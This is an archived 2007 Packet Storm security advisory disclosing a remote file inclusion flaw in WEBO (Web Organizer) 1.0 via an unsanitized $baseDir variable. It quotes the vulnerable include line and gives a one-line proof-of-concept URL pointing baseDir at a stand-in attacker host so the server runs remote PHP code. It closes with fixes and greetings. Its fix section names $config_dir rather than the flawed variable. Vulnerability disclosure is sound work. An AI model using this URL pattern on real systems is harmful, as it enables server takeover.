adv67-K-159-2007.txt

2007-03-13T00:00:00
ID PACKETSTORM:55019
Type packetstorm
Reporter M.Hasran Addahroni
Modified 2007-03-13T00:00:00

Description

                                        
                                            `ECHO_ADV_67$2007  
  
-----------------------------------------------------------------------------------------  
[ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability  
-----------------------------------------------------------------------------------------  
  
Author : M.Hasran Addahroni  
Date : March, 9th 2007  
Location : Australia, Sydney  
Web : http://advisories.echo.or.id/adv/adv67-K-159-2007.txt  
Critical Lvl : Dangerous  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : WEBO (Web Organizer)   
version : 1.0  
Vendor : http://sourceforge.net/projects/weborganizer/  
Description :  
  
WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~  
- Invalid include function at modules/abook/foldertree.php :  
  
---------------foldertree.php--------------------------------------  
<?php  
  
/* memento :  
TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" )  
TreeItem( $label, $url, $target="", $icon="", $options="" )  
*/  
  
include_once( "$baseDir/lib/HTML/tree.php");  
...  
------------------------------------------------------------------  
  
Variables $baseDir are not properly sanitized.  
When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.  
  
  
Poc/Exploit:  
~~~~~~~~~~  
  
http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir==http://attacker.com/evil?  
  
  
Solution:  
~~~~~~~  
  
- Sanitize variable $config_dir on affected files.  
- Turn off register_globals  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~  
~ ping - my dearest wife, and my little son, for all the luv the tears n the breath  
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)  
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw  
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16  
~ newbie_hacker@yahoogroups.com  
~ #aikmel #e-c-h-o @irc.dal.net  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~  
  
K-159 || echo|staff || eufrato[at]gmail[dot]com  
Homepage: http://k-159.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`